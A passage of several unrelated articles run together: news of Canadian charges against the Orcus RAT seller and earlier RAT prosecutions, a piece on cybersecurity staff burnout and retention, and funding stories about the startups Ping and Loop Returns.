Canadian investigators don’t appear to be buying Revesz’ claims. On Monday the Royal Canadian Mounted Police (RCMP) announced it had charged Revesz with operating an international malware distribution scheme under the company name “Orcus Technologies.”

“An RCMP criminal investigation began in July 2016 after reports of a significant amount of computers were being infected with a ‘Remote Access Trojan’ type of virus,” the agency said in a statement.

The RCMP filed the charges eight months after executing a search warrant at Revesz’ home, where they seized several hard drives containing Orcus RAT customer names, financial transactions, and other information.

“The evidence obtained shows that this virus has infected computers from around the world, making thousands of victims in multiple countries,” the RCMP said.

Revesz did not respond to requests for comment.

If Revesz’s customers are feeling the heat right now, they probably should be. Several former customers of his took to Hackforums[.]net to complain about being raided by investigators who are trying to track down individuals suspected of using Orcus to infect computers with malware.

“I got raided [and] within the first 5 minutes they mention Orcus to me,” complained one customer on Hackforums[.]net, the forum where Revesz principally advertised his software. That user pointed to a March 2019 media advisory released by the Australian Federal Police, who said they’d executed search warrants there as part of an investigation into RAT technology conducted in tandem with the RCMP.

According to Revesz himself, the arrests and searches related to Orcus have since expanded to individuals in the United States and Germany.

The sale and marketing of remote administration tools is not illegal in the United States, and indeed there are plenty such tools sold by legitimate companies to help computer experts remotely administer computers.

However, these tools tend to be viewed by prosecutors as malware and spyware when their proprietors advertise them as hacking devices and provide customer support aimed at helping buyers deploy the RATs stealthily and evade detection by anti-malware programs.

Last year, a 21-year-old Kentucky man pleaded guilty to authoring and distributing a popular hacking tool called “LuminosityLink,” which experts say was used by thousands of customers to gain access to tens of thousands of computers across 78 countries worldwide.

Also in 2018, 27-year-old Arkansas resident Taylor Huddleston was sentenced to three years in jail for making and selling the “NanoCore RAT,” which was being used to spy on webcams and steal passwords from systems running the software.

In many previous law enforcement investigations targeting RAT developers and sellers, investigators also have targeted customers of these products. In 2014, the U.S. Justice Department announced a series of actions against more than 100 people accused of purchasing and using “Blackshades,” a cheap and powerful RAT that the U.S. government said was used to infect more than a half million computers worldwide.

It’s remarkable how many denizens of various hacking forums persist in believing that an end-user licensing agreement (EULA) or “terms of service” (TOS) disavowing any responsibility for what customers do with the product somehow absolves sellers of RAT programs of any liability when they then turn around and actively assist customers in using the tools to infect systems with malware.

Stop the Churn, Avoid Burnout | How To Keep Your Cybersecurity Personnel

According to recent research, the global cybersecurity workforce, currently estimated to be close to 3 million people, needs to grow by around 4 million or 62% in order to meet current demand. The shortage of cyber manpower has a significant impact not only on organizations, which struggle to fill the ranks, but also on security professionals, who have to cope with the pressures brought by understaffing. There are many indications that these professionals, who are in such high demand, suffer from stress and intensive workloads, and are likely to leave their current employer for a better-paying job tomorrow.

Eight out of ten analysts say their SOC had experienced between 10% and 50% analyst churn in the past year. What are the reasons for these high churn rates, and what could a security manager do in order to combat this phenomenon? Let’s take a look.


Security is a Stressful Profession

In a survey covering the first 6 months of 2019, some 1500 of 6000 (25%) cybersecurity professionals said their organization had been the victim of a data breach, and 2160 (36%) of those who had not been breached believed their organization could currently be facing a breach without their knowledge.

In the light of such pressures, it’s perhaps not a great surprise that almost half (49%) of those surveyed reported that they are kept awake at night worrying about their organization’s cybersecurity.

On top of worries about imminent threats, staff also report that a lack of security awareness among their organization’s staff in general and a lack of buy-in regarding security best practices at the executive level contribute to increasing stress. Of major concern to cybersecurity professionals is that it is more often than not C-Suite executives that are most likely to disregard security safeguards, the very people most likely to be targeted in spearphishing and advanced threat actor attacks. 

Increased Workload Due to Lack of Manpower

66% of respondents claim that the cybersecurity skills shortage has resulted in an increased workload on existing staff. Since organizations don’t have enough people, they simply pile more work onto those that they have. This leads to human error, misalignment of tasks to skills, and employee burnout.

69% of organisations say their cybersecurity teams are understaffed, and 17% of professionals said that they had considered leaving their current position due to a lack of resources.

The average enterprise SOC encounters anything between 10,000 and a million alerts per day. Many of these alerts are false positives. One survey found that more than half of respondents reported a false-positive rate of 50% or higher. Most now say they spend the majority of their time trying to manage the high volume of alerts.

Alert fatigue (a term coined by medical professionals) is now widely associated with passive detection and response security technologies. It causes stress, reduces productivity and, over time, leads to the psychological effects of depression and apathy. Obviously, these can greatly affect an employee’s will to remain in their position.

What Can You Do To Retain Your Cybersecurity Staff?

The cybersecurity profession is fairly new, and it lacks a common, industry-wide, professional framework for career progression. However, there is still a wide variety of respected certification programs, training courses and skills development platforms, not to mention an increasing number of hacker/security cons where training courses are often run alongside the presentation of papers and products. Despite the wealth of available resources, nearly half of surveyed SOC analysts say they get 20 or fewer hours of training per year.

 

Invest In Skills To Keep Your People, & Improve Enterprise Security

Organizations would be wise to invest in building their teams’ professional knowledge. This could be achieved by periodic training at Cyber-ranges, tabletop exercises or on-prem simulations. Allowing staff to attend professional lectures and encouraging the consumption of professional materials like reverse engineering training and threat intelligence is also a great way to invest in skills.

In some quarters, managers fear that investing in employee training only equips the employee to move on to a more lucrative job elsewhere. Viewed in that light, training can be seen as a cost rather than an investment. The facts, however, suggest otherwise. The main factors employees state for being happy with their current employer are that they are valued by management, are constantly challenged to improve their skills, and prefer to advance in position rather than start out somewhere new.

Investing in skills doesn’t just have the pay-off of stemming churn in your SOC either. It means you’re actively improving the knowledgebase and in-house talent you already possess, which naturally makes a huge contribution to improved organizational security.

Educate Your Business – “Security Aren’t The Bad Guys”

Security analysts are people, and they work with, and provide services to other employees. For a long time, IT security people were perceived as the “bad guys” - technocrats whose interest in securing the organization outweighs their affection for their peers. How else can you explain their demand that you change your password every two weeks, and that they make you come to them to release a file your client has sent you? 

Educating the broader workforce on the importance of cybersecurity, and the fact that these cyber-practitioners are actually securing the entire organization, will go a long way to boost their morale and sense of value to the organization.   

Smarter Tech Works For Everybody

Security managers should invest in implementing the necessary procedures and tools to increase automation, reduce menial work and lower the frequency of alerts. Also, replacing older tech with modern security tools will give analysts professional satisfaction – they now work with the best tools in the business, and a modern UI is so much easier to work with, improving productivity and reducing frustration.   

 

Conclusion

Reducing attrition should be an organizational task. It is tempting to think that technology alone will solve the issue, but it won’t. People are the backbone of the security organization, and will remain such for many years. But given the scarcity of human resources, organizations must ensure that their people are utilized in the best way possible – meaning they are not wasting time chasing false positives or implementing difficult to use products. The people who are already employed must be well trained and equipped with the best tools to allow them to focus on the severe threats the organization is facing. They should also be appreciated throughout the organization. These actions will go a long way to reducing cybersecurity staff churn and improving efficiency and well-being within the business.



Lawyers hate timekeeping — Ping raises $13M to fix it with AI

Counting billable time in six-minute increments is the most annoying part of being a lawyer. It’s a distracting waste. It leads law firms to conservatively under-bill. And it leaves lawyers stuck manually filling out timesheets after a long day when they want to go home to their families.

Life is already short, as Ping CEO and co-founder Ryan Alshak knows too well. The former lawyer spent years caring for his mother as she battled a brain tumor before her passing. “One minute laughing with her was worth a million doing anything else,” he tells me. “I became obsessed with the idea that we spend too much of our lives on things we have no need to do — especially at work.”

That’s motivated him as he’s built his startup Ping, which uses artificial intelligence to automatically track lawyers’ work and fill out timesheets for them. There’s a massive opportunity to eliminate a core cause of burnout, lift law firm revenue by around 10% and give them fresh insights into labor allocation.

Ping co-founder and CEO Ryan Alshak (Image Credit: Margot Duane)

That’s why today Ping is announcing a $13.2 million Series A led by Upfront Ventures, along with BoxGroup, First Round, Initialized and Ulu Ventures. Adding to Ping’s quiet $3.7 million seed led by First Round last year, the startup will spend the cash to scale up enterprise distribution and become the new timekeeping standard.

“I was a corporate litigator at Manatt Phelps down in LA and joke that I was voted the world’s worst timekeeper,” Alshak tells me. “I could either get better at doing something I dreaded or I could try and build technology that did it for me.”

The promise of eliminating the hassle could make any lawyer who hears about Ping an advocate for the firm buying the startup’s software, like how Dropbox grew as workers demanded easier file sharing. “I’ve experienced first-hand the grind of filling out timesheets,” writes Initialized partner and former attorney Alda Leu Dennis. “Ping takes away the drudgery of manual timekeeping and gives lawyers back all those precious hours.”

Traditionally, lawyers have to keep track of their time by themselves down to the tenth of an hour — reviewing documents for the Johnson case, preparing a motion to dismiss for the Lee case, a client phone call for the Sriram case. There are timesheets built into legal software suites like MyCase, legal billing software like TimeSolv and one-off tools like Time Miner and iTimeKeep. They typically offer timers that lawyers can manually start and stop on different devices, with some providing tracking of scheduled appointments, call and text logging, and integration with billing systems.

Ping goes a big step further. It uses AI and machine learning to figure out whether an activity is billable, for which client, a description of the activity and its codification beyond just how long it lasted. Instead of merely filling in the minutes, it completes all the logs automatically, with entries like “Writing up a deposition – Jenkins Case – 18 minutes.” Then it presents the timesheet to the user for review before they send it to billing.

The big challenge now for Alshak and the team he’s assembled is to grow up. They need to go from cat-in-sunglasses logo Ping to mature wordmark Ping. “We have to graduate from being a startup to being an enterprise software company,” the CEO tells me. That means learning to sell to C-suites and IT teams, rather than just build a solid product. In the relationship-driven world of law, that’s a very different skill set. Ping will have to convince clients it’s worth switching to not just for the time savings and revenue boost, but for deep data on how they could run a more efficient firm.

Along the way, Ping has to avoid any embarrassing data breaches or concerns about how its scanning technology could violate attorney-client privilege. If it can win this lucrative first business in legal, it could barge into the consulting and accounting verticals next to grow truly huge.

With eager customers, a massive market, a weak status quo and a driven founder, Ping just needs to avoid getting in over its head with all its new cash. Spent well, the startup could leap ahead of the less tech-savvy competition.

Alshak seems determined to get it right. “We have an opportunity to build a company that gives people back their most valuable resource — time — to spend more time with their loved ones because they spent less time working,” he tells me. “My mom will live forever because she taught me the value of time. I am deeply motivated to build something that lasts . . . and do so in her name.”

Loop Returns picks up $10 million in Series A led by FirstMark Capital

Loop Returns, the startup that helps brands handle returns from online purchases, has today announced the close of a $10 million Series A funding round led by FirstMark Capital. Lerer Hippeau and Ridge Ventures also participated in the round.

Loop started when Jonathan Poma, a co-founder and COO and president, was working at an agency and consulting with a big Shopify brand on how to improve their system for returns and exchanges. After partnering with longtime friend Corbett Morgan, Loop Returns was born.

Loop sits on top of Shopify to handle all of a brand’s returns. It first asks the customer if they’d like a different size in the item they bought, quickly managing an exchange. It then asks if the customer would prefer to exchange for a new item altogether, depositing the credit in that person’s account in real time so they can shop for something new immediately.

If an exchange isn’t in the cards, Loop will ask the customer if they’d prefer credit with this brand over a straight-up refund.

The goal, according to Poma and Morgan, is to turn the point of return into a moment where brands can create a life-loyal customer when handled quickly and properly.

The more we shop online, the more brands extend themselves financially, and returns are a big part of that. Returns account for 20 to 30% of e-commerce sales, which can become a terrible financial burden on a growing direct-to-consumer brand. And what’s more, the cost of acquiring those users in the first place also goes down the drain.

Loop Returns hopes to keep that customer in the fold by giving them post-purchase options that are more sticky and more lucrative for the brand than a refund.

The company thinks of it as Connection Infrastructure. Most brands already have a customer acquisition architecture, and Shopify and Amazon are ahead when it comes to the infrastructure around customer convenience. But the ties that bind customers to brands haven’t been optimized for the many D2C brands out there looking to make an impact.

“The big problem we’re trying to solve long term is connection infrastructure,” said Morgan. “Why does this brand matter? Why does it mean something to me? Why does the product matter? We want to enforce more mindfulness and meaning into buying.”

Of course, a more mindful shopper doesn’t yield as many returns. Poma and Morgan admit that the goal of their software is to minimize returns, the very reason for the software’s existence. After all, return volume is one of a handful of variables that help Loop Returns determine what it will charge its brand clients.

But the team is thinking about other layers of the connection infrastructure, with plans to launch a product in 2020 that also focuses on the connection point after purchase. Poma and Morgan believe, with an almost religious reverence, that the brands themselves will help lead shoppers and infrastructure providers to a better, more connected shopping experience.

“Brands are the torch bearers,” said Poma. “They will lead us to a more enlightened era of how we think about buying. Empowerment of the brand will lead us to a better consumerism.”

The co-founders stayed mum on any specific plans for the 2020 product, but did say they will use the funding to expand operations and further build out its current and future products.

Of course, Loop is playing in a crowded space. Not only are there other players thinking about post-purchase connection, but Shopify has itself built out tools to help with exchanges and returns, and even acquired Return Magic, a similar service, in the summer of 2018.

That said, Loop Returns believes there is a long way to go as it builds the “connection infrastructure,” and that one clear path forward is actual personalization. With data from returns and exchanges, Loop Returns is relatively well-positioned to take on personalization in a meaningful way.

For now, Loop Returns has more than 200 customers and has handled more than 2 million returns, working with brands like Brooklinen, Allbirds, PuraVida and more.